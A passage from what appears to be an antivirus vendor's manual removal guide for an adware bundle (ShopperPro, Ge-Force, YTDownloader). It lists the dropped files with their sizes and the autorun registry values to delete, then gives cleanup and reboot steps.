    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsProcess.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\AccDownload.dll (9320 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\System.dll (11 bytes)
    %Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
    %Program Files%\ShopperPro\manifest.json (595 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\jsdrv.exe (100378 bytes)
    %Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsB.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsExec.dll (6 bytes)
    %WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
    %Program Files%\ShopperPro\database1_0_0.ej (6 bytes)
    %Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
    %Program Files%\Ge-Force\fca20dba-4ecb-4c27-af30-29134a166813-5.exe (7547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\vbsqyfj.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\btqiknpx.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\kbkvm.dll (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\qoozvalm.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\yfovh.dll (28288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\413541 (8876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\System.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[2] (40 bytes)
    %Program Files%\Ge-Force\Uninstall.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\lxpnxblef.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\18420 (38869 bytes)
    %Program Files%\Ge-Force\utils.exe (71855 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\wgldbpigk.dll (6 bytes)
    %WinDir%\Tasks\fca20dba-4ecb-4c27-af30-29134a166813-5.job (72 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj14.tmp (567693 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\setup1.exe (229796 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\NK.lky (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\setup.exe (2555480 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\D1958.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst5.tmp (240925 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_e (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_d (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_c (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_b (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_a (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Lyqdtqcl.tmp (347770 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Smskc.exe (1247400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\auhdqaj.dll (2021 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\qoozvalm.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\lxpnxblef.dll (11 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
